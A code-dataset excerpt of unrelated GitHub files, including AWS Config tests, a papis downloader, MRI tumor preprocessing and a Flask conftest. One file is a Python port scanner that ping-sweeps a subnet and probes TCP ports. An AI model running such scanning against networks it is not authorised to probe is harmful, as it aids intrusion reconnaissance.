ASG_CLIENT_MOCK.describe_auto_scaling_groups.return_value = self.asg_launch_config\n ASG_CLIENT_MOCK.describe_launch_configurations.return_value = self.launch_config\n EC2_CLIENT_MOCK.describe_images.return_value = self.deprecated_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'ASG'})\n asg = self.asg_launch_config['AutoScalingGroups'][0]\n launch_config = self.launch_config['LaunchConfigurations'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.NON_COMPLIANT,\n resourceId=asg['AutoScalingGroupName'],\n resourceType='AWS::AutoScaling::AutoScalingGroup',\n annotation=f'Image {launch_config[\"ImageId\"]} is deprecated'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\n def test_evaluate_noncompliant_asg_launch_template_missing_ami(self):\n ASG_CLIENT_MOCK.describe_auto_scaling_groups.return_value = self.asg_launch_template\n ASG_CLIENT_MOCK.describe_launch_template_versions.return_value = self.launch_template_versions\n EC2_CLIENT_MOCK.describe_images.return_value = self.missing_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'ASG'})\n asg = self.asg_launch_template['AutoScalingGroups'][0]\n launch_template_version = self.launch_template_versions['LaunchTemplateVersions'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.NON_COMPLIANT,\n resourceId=asg['AutoScalingGroupName'],\n resourceType='AWS::AutoScaling::AutoScalingGroup',\n annotation=f'Error checking {launch_template_version[\"LaunchTemplateData\"][\"ImageId\"]}, assuming noncompliant'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"awslabs/aws-config-rules","sub_path":"python-rdklib/AMI_DEPRECATED_CHECK/AMI_DEPRECATED_CHECK_test.py","file_name":"AMI_DEPRECATED_CHECK_test.py","file_ext":"py","file_size_in_byte":9044,"program_lang":"python","lang":"en","doc_type":"code","stars":1509,"dataset":"github-code","pt":"81"} +{"seq_id":"593948714","text":"import re\nfrom typing import Any, ClassVar, Dict, Optional\n\nimport papis.downloaders.base\n\n\nclass Downloader(papis.downloaders.Downloader):\n DOCUMENT_URL: ClassVar[str] = \"https://annualreviews.org/doi/pdf/{doi}\"\n\n BIBTEX_URL: ClassVar[str] = (\n \"https://annualreviews.org/action/downloadCitation\"\n \"?format=bibtex&cookieSet=1&doi={doi}\"\n )\n\n def __init__(self, url: str) -> None:\n super().__init__(\n url, \"annualreviews\",\n expected_document_extension=\"pdf\",\n 
priority=10,\n )\n\n @classmethod\n def match(cls, url: str) -> Optional[papis.downloaders.Downloader]:\n if re.match(r\".*annualreviews.org.*\", url):\n return Downloader(url)\n else:\n return None\n\n def get_document_url(self) -> Optional[str]:\n if \"doi\" in self.ctx.data:\n url = self.DOCUMENT_URL.format(doi=self.ctx.data[\"doi\"])\n self.logger.debug(\"Using document URL: '%s'.\", url)\n\n return url\n else:\n return None\n\n def get_bibtex_url(self) -> Optional[str]:\n if \"doi\" in self.ctx.data:\n url = self.BIBTEX_URL.format(doi=self.ctx.data[\"doi\"])\n self.logger.debug(\"Using BibTeX URL: '%s'.\", url)\n\n return url\n else:\n return None\n\n def get_data(self) -> Dict[str, Any]:\n data = {}\n soup = self._get_soup()\n data.update(papis.downloaders.base.parse_meta_headers(soup))\n\n if \"author_list\" in data:\n return data\n\n cleanregex = re.compile(r\"(^\\s*|\\s*$|&)\")\n editorregex = re.compile(r\"([\\n|]|\\(Reviewing\\s*Editor\\))\")\n morespace = re.compile(r\"\\s+\")\n\n # Read brute force the authors from the source\n author_list = []\n authors = soup.find_all(name=\"span\", attrs={\"class\": \"contribDegrees\"})\n\n for author in authors:\n affspan = author.find_all(\"span\", attrs={\"class\": \"overlay\"})\n afftext = affspan[0].text if affspan else \"\"\n fullname = re.sub(\n \",\", \"\", cleanregex.sub(\"\", author.text.replace(afftext, \"\")))\n split_fullname = re.split(r\"\\s+\", fullname)\n cafftext = re.sub(\" ,\", \",\",\n morespace.sub(\" \", cleanregex.sub(\"\", afftext)))\n\n if \"Reviewing Editor\" in fullname:\n data[\"editor\"] = cleanregex.sub(\n \" \", editorregex.sub(\"\", fullname))\n continue\n\n given = split_fullname[0]\n family = \" \".join(split_fullname[1:])\n author_list.append({\n \"given\": given,\n \"family\": family,\n \"affiliation\": [{\"name\": cafftext}] if cafftext else []\n }\n )\n\n data[\"author_list\"] = author_list\n data[\"author\"] = papis.document.author_list_to_author(data)\n\n return data\n","repo_name":"papis/papis","sub_path":"papis/downloaders/annualreviews.py","file_name":"annualreviews.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":1237,"dataset":"github-code","pt":"81"} +{"seq_id":"11875685145","text":"st_name = ['송지우', '심현준', '윤호민']\r\nst_score = [93, 78, 89]\r\n\r\n\r\nfor i in range(len(st_name)):\r\n name = st_name[i]\r\n score = st_score[i]\r\n \r\n if score >= 90:\r\n grade = 'A'\r\n elif score >= 80:\r\n grade = 'B'\r\n elif score >= 70:\r\n grade = 'C'\r\n elif score >= 60:\r\n grade = 'D'\r\n else:\r\n grade = 'F'\r\n \r\n print(f\"-{name}- 학점: {grade}\")\r\n","repo_name":"joohyoengjin/JHJ_WEB","sub_path":"VSpython/Trading/학점구하기.py","file_name":"학점구하기.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33569461750","text":"import socket\nimport subprocess\nfrom tqdm import tqdm\nimport os\nimport time\nimport pyfiglet\nfrom termcolor import colored\n\n# --------------------------------------------------------------------------------\n# FUNÇÕES\n# --------------------------------------------------------------------------------\n\ndef inicio():\n texto = \"\\n PORT SCANNER\"\n titulo = pyfiglet.figlet_format(texto, font=\"slant\")\n\n colored_ascii_banner = colored(titulo, 'green')\n print(colored_ascii_banner)\n print(\"\\033[1;32m-\\033[00m\"*50)\n print(\" \"*12 + \"\\033[1;32mBEM VINDO AO PORT SCANNER\\033[00m\" + \" \"*12)\n 
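    # Illustrative sketch of the colour codes used in this banner (GREEN and
    # RESET are assumed helper names introduced only for this sketch; the
    # scanner itself keeps writing the escape sequences inline): "\033[1;32m"
    # is the ANSI escape for bold green and "\033[00m" resets the attributes.
    GREEN = "\033[1;32m"   # bold green
    RESET = "\033[00m"     # reset colour/attributes
    _example_separator = GREEN + "-" * 50 + RESET  # same separator string as the prints around it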
print(\"\\033[1;32m-\\033[00m\"*50 + \"\\n\")\n\n time.sleep(1)\n print(\"Carregando mapa de rede...\\n\")\n time.sleep(1)\n\n #get_ip()\n\n ip = input(\"Digite o IP desejado: \\n\")\n\n if ip == \"\":\n print(\"\\033[31mDigite um IP válido\\033[00m\\n\")\n inicio()\n\n ports_input = input(\"Digite o RANGE de portas separado por uma vírgula | Digite uma única porta | ENTER para mapear todas: \\n\")\n\n if ports_input == \"\":\n ports = list(range(1, 65536))\n elif \",\" in ports_input:\n start, end = map(int, ports_input.split(\",\"))\n ports = list(range(start, end + 1))\n else:\n ports = [int(ports_input)]\n\n ports_map(ports, ip)\n\ndef get_ip():\n os.system(\"clear\")\n\n print(\"\\033[1;32m-\\033[00m\"*50)\n print(\" \"*12 + \"\\033[1;32mBEM VINDO AO PORT SCANNER\\033[00m\" + \" \"*12)\n print(\"\\033[1;32m-\\033[00m\"*50 + \"\\n\")\n\n time.sleep(1)\n\n print(\"\\033[95m-\\033[00m\"*30)\n print(\" \"*6 + \"\\033[95mMAPEAMENTO DA REDE\\033[00m\" + \" \"*6)\n print(\"\\033[95m-\\033[00m\"*30 + \"\\n\")\n\n time.sleep(1)\n\n fix_ip = input(\"Digite os 3 primeiros números do endereço IP da rede (ex: 192.168.3): \\n\")\t\n\n ips = [fix_ip + '.' + str(i) for i in range(1, 255)]\n\n available_ips = []\n\n for ip in tqdm(ips, desc=\"Verificando IPs\"):\n response = subprocess.run(['ping', '-c', '1', '-w', '1', ip], stdout=subprocess.DEVNULL)\n if response.returncode == 0:\n available_ips.append(ip)\n\n print(\"IPs disponíveis: \" + str(len(available_ips)) + \"\\n\")\n\n for ip in available_ips:\n print(ip + \" está disponível\")\n\ndef ports_map(ports, ip):\n well_known_ports = {\n 20: 'FTP (File Transfer Protocol)',\n 21: 'FTP (File Transfer Protocol)',\n 22: 'SSH (Secure Shell)',\n 23: 'Telnet',\n 25: 'SMTP (Simple Mail Transfer Protocol)',\n 53: 'DNS (Domain Name System)',\n 80: 'HTTP (Hypertext Transfer Protocol)',\n 110: 'POP3 (Post Office Protocol version 3)',\n 119: 'NNTP (Network News Transfer Protocol)',\n 123: 'NTP (Network Time Protocol)',\n 143: 'IMAP (Internet Message Access Protocol)',\n 161: 'SNMP (Simple Network Management Protocol)',\n 194: 'IRC (Internet Relay Chat)',\n 443: 'HTTPS (HTTP Secure)',\n 445: 'SMB (Server Message Block)',\n 465: 'SMTPS (Simple Mail Transfer Protocol Secure)',\n 514: 'Syslog',\n 587: 'SMTP (Mail Submission)',\n 631: 'IPP (Internet Printing Protocol)',\n 873: 'rsync',\n 993: 'IMAPS (Internet Message Access Protocol Secure)',\n 995: 'POP3S (Post Office Protocol version 3 Secure)',\n 1080: 'SOCKS (SOCKetS)',\n 1194: 'OpenVPN',\n 1433: 'Microsoft SQL Server',\n 1434: 'Microsoft SQL Server',\n 1521: 'Oracle',\n 1723: 'PPTP (Point-to-Point Tunneling Protocol)',\n 3306: 'MySQL',\n 3389: 'RDP (Remote Desktop Protocol)',\n 5432: 'PostgreSQL',\n 5900: 'VNC (Virtual Network Computing)',\n 5901: 'VNC (Virtual Network Computing)',\n 5902: 'VNC (Virtual Network Computing)',\n 5903: 'VNC (Virtual Network Computing)',\n 6379: 'Redis',\n 8080: 'HTTP Alternate (http_alt)',\n 8443: 'HTTPS Alternate (https_alt)',\n 9000: 'Jenkins',\n 9090: 'HTTP Alternate (http_alt)',\n 9091: 'HTTP Alternate (http_alt)'\n }\n \n open_ports = False\n for port in tqdm(ports, leave=False):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(0.1)\n result = s.connect_ex((ip, port))\n if result == 0:\n service_name = socket.getservbyport(port)\n well_known_service = well_known_ports.get(port)\n if port in well_known_ports.keys():\n tqdm.write(f\"Porta \\033[35m{port}\\033[00m (\\033[33m{service_name}\\033[00m) \\033[32mSERVIÇO QUE DEVERIA RODAR: 
{well_known_service}\\033[00m - {ip}\")\n else:\n tqdm.write(f\"Porta \\033[35m{port}\\033[00m (\\033[33m{service_name}\\033[00m) \\033[031mSERVIÇO DESCONHECIDO\\033[00m - {ip}\")\n open_ports = True\n s.close()\n\n except:\n continue\n\n print(\"\\033[1;32mMapeamento completo!033[00m \\n\")\n\n if not open_ports:\n print(\"\\033[31mNenhuma porta aberta encontrada\\033[00m\")\n\n\nif __name__ == \"__main__\":\n inicio()","repo_name":"henriquemf/techack","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"25823738646","text":"\"\"\"This makes the test configuration setup\"\"\"\n# pylint: disable=redefined-outer-name\nimport os\nimport pytest\n\nfrom flask.testing import FlaskClient\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import login_user, logout_user, current_user\n\nfrom app import create_app, db\nfrom app.db.models import User\n\n\ndb = SQLAlchemy()\n\n@pytest.fixture()\ndef application():\n \"\"\"This makes the app\"\"\"\n #os.environ['FLASK_ENV'] = 'development'\n os.environ['FLASK_ENV'] = 'testing'\n application = create_app()\n\n with application.app_context():\n db.create_all()\n yield application\n db.session.remove()\n db.drop_all()\n\n@pytest.fixture()\ndef app_client(application):\n ctx = application.test_request_context()\n ctx.push()\n application.test_client_class = FlaskClient\n return application.test_client()\n\n@pytest.fixture()\ndef add_user(application):\n with application.app_context():\n user = User('test@test.com', 'testtest')\n db.session.add(user)\n db.session.commit()\n\n\n@pytest.fixture()\ndef client(application):\n \"\"\"This makes the http client\"\"\"\n return application.test_client()\n\n\n@pytest.fixture()\ndef runner(application):\n \"\"\"This makes the task runner\"\"\"\n return application.test_cli_runner()","repo_name":"onahte/banking_web_app","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21069125985","text":"class Employee:\n def __init__(self,id,name,salary,desig):\n self.id=id\n self.name = name\n self.salary = salary\n self.desig = desig\n\n def __str__(self):\n return self.name\n\n\nobj1=Employee(100,'ajay',25000,'developer')\nobj2=Employee(101,'vijay',20000,'developer')\nobj3=Employee(102,'binoy',22000,'qa')\n\n#convert empolyee name upper case\n\nlst=[]\nlst.append(obj1)\nlst.append(obj2)\nlst.append(obj3)\n# for emp in lst:\n# print(emp)\nprint(lst)\nupnames=list(map(lambda emp:emp.name.upper(),lst))\nprint(upnames)","repo_name":"amalmhn/PythonDjangoProjects","sub_path":"functional_programming/map_reduce_filter/object_filter.py","file_name":"object_filter.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20244791450","text":"import time\nimport pandas as pd\n\n\ndef date_filter(date):\n # 判断输入日期距今是否超出 60 天\n\n if not date or date == \"-\":\n return \"未命中\"\n\n d = pd.to_datetime(date)\n n = pd.to_datetime(time.strftime(\"%Y.%m.%d, %H:%M:%S\"))\n\n if abs((d-n).days) > 60:\n return \"超过60天\"\n\n return \"少于60天\"\n\n\nif __name__ == \"__main__\":\n out_data = pd.read_csv(\"互联网边界防火墙内对外下载数据.csv\")\n out_data[\"上次命中时间\"] = out_data[\"最近命中时间\"].apply(date_filter)\n\n in_data = pd.read_csv(\"互联网边界防火墙外对内下载数据.csv\")\n 
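    # Illustrative sketch of what date_filter() does to each value (the
    # _example_* names are assumptions for this sketch only and are not used
    # elsewhere): parse the timestamp, compare it with "now", and flag anything
    # more than 60 days away.
    _example_hit = pd.to_datetime("2021-01-01 08:00:00")
    _example_now = pd.to_datetime(time.strftime("%Y.%m.%d, %H:%M:%S"))
    _example_age = abs((_example_hit - _example_now).days)
    # date_filter("2021-01-01 08:00:00") returns "超过60天", since that
    # timestamp is by now more than 60 days in the past.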
in_data[\"上次命中时间\"] = in_data[\"最近命中时间\"].apply(date_filter)\n\n\n with pd.ExcelWriter(\"互联网边界防火墙策略_命中统计.xlsx\") as writer:\n out_data.to_excel(writer, sheet_name=\"内对外\", index=False)\n in_data.to_excel(writer, sheet_name=\"外对内\", index=False)\n","repo_name":"wyfffffei/network_utils","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23358671067","text":"import sys\nfrom collections import defaultdict\n\ndef lrud(r, c, N, M, planet):\n node = []\n if r-1 >= 0:\n if planet[r-1][c] != 1:\n node.append([r-1, c])\n else : \n if planet[N-1][c] != 1:\n node.append([N-1, c])\n\n if r+1 < N:\n if planet[r+1][c] != 1:\n node.append([r+1, c])\n else : \n if planet[0][c] != 1:\n node.append([0, c])\n \n if c+1 < M:\n if planet[r][c+1] != 1:\n node.append([r, c+1])\n else : \n if planet[r][0] != 1:\n node.append([r, 0])\n\n if c-1 >= 0:\n if planet[r][c-1] != 1:\n node.append([r, c-1])\n else : \n if planet[r][M-1] != 1:\n node.append([r, M-1])\n return node\n\ndef hashPlanet(N, M, planet):\n newPlanet = [[[]for _ in range(M)]for _ in range(N)]\n for r in range(N):\n for c in range(M):\n if planet[r][c] == 0:\n for n in lrud(r, c, N, M, planet):\n newPlanet[r][c].append(n)\n return newPlanet\n\ndef dfs(planet, hPlanet, r, c):\n stack = [[r, c]]\n visited = defaultdict(int)\n while stack:\n node = stack.pop()\n visited[node[0]*1000 + node[1]] = 1\n for n in hPlanet[node[0]][node[1]]:\n if visited[n[0]*1000 + n[1]] == 0:\n stack.append(n)\n planet[n[0]][n[1]] = 1\n return planet\n\nN, M = map(int, sys.stdin.readline().split())\n\nplanet = []\nfor n in range(N):\n planet.append(list(map(int, sys.stdin.readline().split())))\n \nhPlanet = hashPlanet(N, M, planet)\nanswer = 0\nfor n in range(N):\n for m in range(M):\n if planet[n][m] == 0:\n planet = dfs(planet, hPlanet, n , m)\n answer += 1\nprint(answer)","repo_name":"EnvyW6567/CodingTestAlgorithm","sub_path":"Wanted_CodingTest/DonutPlanet.py","file_name":"DonutPlanet.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35160494445","text":"from ..crawler.wallet import Metamask\nfrom typing import Optional\nfrom ..crawler.exchange.crawling import Crawling\nfrom ..base import Exchange\nfrom ..base.utils.retry import retry\nimport asyncio\n\n\nclass Liamaswap(Crawling, Exchange):\n def __init__(self, config_change: Optional[dict] = {}) -> None:\n super().__init__()\n\n config = {\n \"chainName\": \"MATIC\",\n \"exchangeName\": \"liamaswap\",\n \"retries\": 3,\n \"retriesTime\": 10,\n \"host\": None,\n \"account\": None,\n \"privateKey\": None,\n \"log\": None,\n \"proxy\": False,\n \"wallet_name\": \"Metamask\",\n \"wallet_config\": {},\n \"driver_path\": None,\n }\n\n config.update(config_change)\n\n # market info\n self.id = 13\n self.chainName = config[\"chainName\"]\n self.exchangeName = config[\"exchangeName\"]\n self.duration = False\n self.addNounce = 0\n self.retries = config[\"retries\"]\n self.retriesTime = config[\"retriesTime\"]\n self.host = config[\"host\"]\n self.account = config[\"account\"]\n self.privateKey = config[\"privateKey\"]\n self.log = config[\"log\"]\n self.proxy = config[\"proxy\"]\n self.wallet_name = config[\"wallet_name\"]\n self.wallet_config = config[\"wallet_config\"]\n self.driver_path = config[\"driver_path\"]\n\n self.load_exchange(self.chainName, self.exchangeName)\n\n 
self.set_logger(self.log)\n self.load_crawling()\n\n # site_config = self.set_site_config(self.chains['baseChain'], tokenA, tokenB)\n\n # @retry\n async def fetch_ticker(self, amountAin, tokenAsymbol, tokenBsymbol, **kwargs):\n best_route = None\n\n amountIn = amountAin\n\n tokenA = self.tokens[tokenAsymbol]\n tokenB = self.tokens[tokenBsymbol]\n\n tokenAaddress = tokenA[\"contract\"]\n tokenBaddress = tokenB[\"contract\"]\n\n site_config = self.set_site_config(self.chains[\"baseChain\"], tokenAaddress, tokenBaddress)\n self.set_site(site_config)\n self.click_liama_hide_ip()\n self.input_liama_size(amountAin)\n\n self.click_liama_perform_reload()\n\n route_lists = self.click_liama_perform_route()\n\n route_lists = list(map(lambda x: x[-1].lower(), route_lists))\n\n self.load_markets(self.chainName, None)\n\n for route_list in route_lists:\n if route_list in self.markets:\n best_route = route_list\n\n return best_route\n\n def set_site_config(self, chain, tokenA, tokenB):\n site_config1 = {\"chain\": chain}\n\n site_config2 = {\"from\": tokenA, \"to\": tokenB}\n\n site_config = [(\"?\", site_config1), (\"&\", site_config2)]\n\n return site_config\n","repo_name":"munsunouk/ccdxt","sub_path":"exchange/liamaswap.py","file_name":"liamaswap.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"18198949615","text":"# Brain Tumor Classification\n# Enhance tumor region in each image.\n# Author: Qixun QU\n# Copyleft: MIT Licience\n\n# ,,, ,,,\n# ;\" '; ;' \",\n# ; @.ss$$$$$$s.@ ;\n# `s$$$$$$$$$$$$$$$'\n# $$$$$$$$$$$$$$$$$$\n# $$$$P\"\"Y$$$Y\"\"W$$$$$\n# $$$$ p\"$$$\"q $$$$$\n# $$$$ .$$$$$. $$$$'\n# $$$DaU$$O$$DaU$$$'\n# '$$$$'.^.'$$$$'\n# '&$$$$$&'\n\n\nfrom __future__ import print_function\n\n\nimport os\nimport warnings\nimport numpy as np\nimport nibabel as nib\n\nfrom multiprocessing import Pool, cpu_count\nfrom scipy.ndimage.interpolation import zoom\n\n\n# Ignore the warning caused by SciPy\nwarnings.simplefilter(\"ignore\", UserWarning)\n\n\n# Helper function to run in multiple processes\ndef unwrap_preprocess(arg, **kwarg):\n return BTCPreprocess._preprocess(*arg, **kwarg)\n\n\nclass BTCPreprocess(object):\n\n def __init__(self, input_dirs, output_dirs, volume_type=\"t1ce\"):\n '''__INIT__\n\n Generates paths for preprocessing.\n Variables:\n - self.in_paths: a list contains path of each input image.\n - self.out_paths: a list provides path for each output image.\n - self.mask_paths: a list contains path of mask for each input image.\n\n Inputs:\n -------\n\n - input_dirs: a list with two lists, [hgg_input_dir, lgg_input_dir],\n path of the directory which saves input images of\\\n HGG and LGG subjects.\n - output_dirs: a list with teo lists, [hgg_output_dir, lgg_output_dir],\n path of output directory for every subject in HGG and LGG.\n - volume_type: string, type of brain volume, one of \"t1ce\", \"t1\", \"t2\"\n or \"flair\". Default is \"t1ce\".\n\n '''\n\n self.in_paths, self.out_paths, self.mask_paths = \\\n self.generate_paths(input_dirs, output_dirs, volume_type)\n\n return\n\n def run(self, is_mask=True, non_mask_coeff=0.333, processes=-1):\n '''RUN\n\n Function to map task to multiple processes.\n\n Inputs:\n -------\n\n - is_mask: boolearn, if True, enhance tumor region.\n Default is True.\n - non_mask_coeff: float from 0 to 1, the coefficient of\n voxels in non-tumor region. Default is 0.333.\n - processes: int, the number of processes used. 
Default is -1,\n which means use all processes.\n\n '''\n\n print(\"\\nPreprocessing on the sample in BraTS dataset.\\n\")\n num = len(self.in_paths)\n\n # Generate parameters\n paras = zip([self] * num, self.in_paths, self.out_paths, self.mask_paths,\n [is_mask] * num, [non_mask_coeff] * num)\n\n # Set the number of processes\n if processes == -1 or processes > cpu_count():\n processes = cpu_count()\n\n # Map task\n pool = Pool(processes=processes)\n pool.map(unwrap_preprocess, paras)\n\n return\n\n def _preprocess(self, in_path, to_path, mask_path,\n is_mask=True, non_mask_coeff=0.333):\n '''_PREPROCESS\n\n For each input image, four steps are done:\n -1- If is_mask, enhance tumor region.\n -2- Remove background.\n -3- Resize image.\n -4- Save image.\n\n Inputs:\n -------\n\n - in_path: string, path of input image.\n - to_path: string, path of output image.\n - mask_path: string, path of the mask of input image.\n - is_mask: boolearn, if True, enhance tumor region.\n Default is True.\n - non_mask_coeff: float from 0 to 1, the coefficient of\n voxels in non-tumor region. Default is 0.333.\n\n '''\n\n try:\n print(\"Preprocessing on: \" + in_path)\n # Load image\n volume = self.load_nii(in_path)\n if is_mask:\n # Enhance tumor region\n mask = self.load_nii(mask_path)\n volume = self.segment(volume, mask, non_mask_coeff)\n # Removce background\n volume = self.trim(volume)\n # Resize image\n volume = self.resize(volume, [112, 112, 96])\n # Save image\n self.save2nii(to_path, volume)\n except RuntimeError:\n print(\"\\tFailed to rescal:\" + in_path)\n return\n\n return\n\n @staticmethod\n def generate_paths(in_dirs, out_dirs, volume_type=None):\n '''GENERATE_PATHS\n\n Generates three lists with files' paths for prerprocessing.\n\n Inputs:\n -------\n\n - input_dirs: a list with two lists, [hgg_input_dir, lgg_input_dir],\n path of the directory which saves input images of\\\n HGG and LGG subjects.\n - output_dirs: a list with teo lists, [hgg_output_dir, lgg_output_dir],\n path of output directory for every subject in HGG and LGG.\n - volume_type: string, type of brain volume, one of \"t1ce\", \"t1\", \"t2\"\n or \"flair\". 
Default is \"t1ce\".\n\n Outputs:\n --------\n\n - in_paths: a list contains path of each input image.\n - out_paths: a list provides path for each output image.\n - mask_paths: a list contains path of mask for each input image.\n\n '''\n\n # Function to create new directory\n # according to given path\n def create_dir(path):\n if not os.path.isdir(path):\n os.makedirs(path)\n return\n\n in_paths, out_paths, mask_paths = [], [], []\n for in_dir, out_dir in zip(in_dirs, out_dirs):\n # For HGG or LFF subjects\n if not os.path.isdir(in_dir):\n print(\"Input folder {} is not exist.\".format(in_dir))\n continue\n\n # Create output folder for HGG or LGG subjects\n create_dir(out_dir)\n\n for subject in os.listdir(in_dir):\n # For each subject in HGG or LGG\n subject_dir = os.path.join(in_dir, subject)\n subject2dir = os.path.join(out_dir, subject)\n # Create folder for output\n create_dir(subject2dir)\n\n scan_names = os.listdir(subject_dir)\n # Get path of mask file\n for scan_name in scan_names:\n if \"seg\" in scan_name:\n scan_mask_path = os.path.join(subject_dir, scan_name)\n\n for scan_name in scan_names:\n if \"seg\" in scan_name:\n continue\n\n if volume_type is not None:\n if volume_type not in scan_name:\n continue\n\n # When find the target volume, save its path\n # and save paths for its output and mask\n in_paths.append(os.path.join(subject_dir, scan_name))\n out_paths.append(os.path.join(subject2dir, scan_name))\n mask_paths.append(scan_mask_path)\n\n return in_paths, out_paths, mask_paths\n\n @staticmethod\n def load_nii(path):\n '''LOAD_NII\n\n Load image to numpy ndarray from NIfTi file.\n\n Input:\n ------\n\n - path: string , path of input image.\n\n Ouput:\n ------\n\n - A numpy array of input imgae.\n\n '''\n\n return np.rot90(nib.load(path).get_data(), 3)\n\n @staticmethod\n def segment(volume, mask, non_mask_coeff=0.333):\n '''SEGMENT\n\n Enhance tumor region by suppressing non-tumor region\n with a coefficient.\n\n Inuuts:\n -------\n\n - volume: numpy ndarray, input image.\n - mask: numpy ndarray, mask with segmentation labels.\n - non_mask_coeff: float from 0 to 1, the coefficient of\n voxels in non-tumor region. 
Default is 0.333.\n\n Output:\n -------\n\n - segged: numpy ndarray, tumor enhanced image.\n\n '''\n\n # Set background to 0\n if np.min(volume) != 0:\n volume -= np.min(volume)\n\n # Suppress non-tumor region\n non_mask_idx = np.where(mask == 0)\n segged = np.copy(volume)\n segged[non_mask_idx] = segged[non_mask_idx] * non_mask_coeff\n\n return segged\n\n @staticmethod\n def trim(volume):\n '''TRIM\n\n Remove unnecessary background around brain.\n\n Input:\n ------\n\n - volume: numpy ndarray, input image.\n\n Output:\n -------\n\n - trimmed: numpy ndarray, image without unwanted background.\n\n '''\n\n # Get indices of slices that have brain's voxels\n non_zero_slices = [i for i in range(volume.shape[-1])\n if np.sum(volume[..., i]) > 0]\n # Remove slices that only have background\n volume = volume[..., non_zero_slices]\n\n # In each slice, find the minimum area of brain\n # Coordinates of area are saved\n row_begins, row_ends = [], []\n col_begins, col_ends = [], []\n for i in range(volume.shape[-1]):\n non_zero_pixels = np.where(volume > 0)\n row_begins.append(np.min(non_zero_pixels[0]))\n row_ends.append(np.max(non_zero_pixels[0]))\n col_begins.append(np.min(non_zero_pixels[1]))\n col_ends.append(np.max(non_zero_pixels[1]))\n\n # Find the maximum area from all minimum areas\n row_begin, row_end = min(row_begins), max(row_ends)\n col_begin, col_end = min(col_begins), max(col_ends)\n\n # Generate a minimum square area taht includs the maximum area\n rows_num = row_end - row_begin\n cols_num = col_end - col_begin\n more_col_len = rows_num - cols_num\n more_col_len_left = more_col_len // 2\n more_col_len_right = more_col_len - more_col_len_left\n col_begin -= more_col_len_left\n col_end += more_col_len_right\n len_of_side = rows_num + 1\n\n # Remove unwanted background\n trimmed = np.zeros([len_of_side, len_of_side, volume.shape[-1]])\n for i in range(volume.shape[-1]):\n trimmed[..., i] = volume[row_begin:row_end + 1,\n col_begin:col_end + 1, i]\n return trimmed\n\n @staticmethod\n def resize(volume, target_shape=[112, 112, 96]):\n '''RESIZE\n\n Resize input image to target shape.\n -1- Resize to [112, 112, 96].\n -2- Crop image to [112, 96, 96].\n\n '''\n\n # Shape of input image\n old_shape = list(volume.shape)\n\n # Resize image\n factor = [n / float(o) for n, o in zip(target_shape, old_shape)]\n resized = zoom(volume, zoom=factor, order=1, prefilter=False)\n\n # Crop image\n resized = resized[:, 8:104, :]\n\n return resized\n\n @staticmethod\n def save2nii(to_path, volume):\n '''SAVE2NII\n\n Save numpy ndarray to NIfTi image.\n\n Input:\n ------\n\n - to_path: string, path of output image.\n - volume: numpy ndarray, preprocessed image.\n\n '''\n # Rotate image to standard space\n volume = volume.astype(np.int16)\n volume = np.rot90(volume, 3)\n\n # Convert to NIfTi\n volume_nii = nib.Nifti1Image(volume, np.eye(4))\n # Save image\n nib.save(volume_nii, to_path)\n\n return\n\n\nif __name__ == \"__main__\":\n\n # Set path for input directory\n parent_dir = os.path.dirname(os.getcwd())\n data_dir = os.path.join(parent_dir, \"data\")\n hgg_input_dir = os.path.join(data_dir, \"HGG\")\n lgg_input_dir = os.path.join(data_dir, \"LGG\")\n input_dirs = [hgg_input_dir, lgg_input_dir]\n\n # Generate Enhanced Tumor\n is_mask = True\n non_mask_coeff = 0.333\n # Set path for output directory\n hgg_output_dir = os.path.join(data_dir, \"HGGSegTrimmed\")\n lgg_output_dir = os.path.join(data_dir, \"LGGSegTrimmed\")\n output_dirs = [hgg_output_dir, lgg_output_dir]\n\n prep = BTCPreprocess(input_dirs, 
output_dirs, \"t1ce\")\n prep.run(non_mask_coeff=non_mask_coeff,\n is_mask=is_mask, processes=-1)\n\n # Generate Non-Enhanced Tumor\n is_mask = False\n # Set path for output directory\n hgg_output_dir = os.path.join(data_dir, \"HGGTrimmed\")\n lgg_output_dir = os.path.join(data_dir, \"LGGTrimmed\")\n output_dirs = [hgg_output_dir, lgg_output_dir]\n\n prep = BTCPreprocess(input_dirs, output_dirs, \"t1ce\")\n prep.run(is_mask=is_mask, processes=-1)\n","repo_name":"quqixun/BTClassification","sub_path":"src/btc_preprocess.py","file_name":"btc_preprocess.py","file_ext":"py","file_size_in_byte":12756,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"81"} +{"seq_id":"14082999447","text":"# coding: utf-8\n\n\"\"\"\nContain solution for the python/numpy training\n\"\"\"\n\n__authors__ = [\"Pierre Knobel\", \"Jerome Kieffer\", \"Henri Payno\",\n \"Armando Sole\", \"Valentin Valls\", \"Thomas Vincent\"]\n__date__ = \"18/09/2018\"\n__license__ = 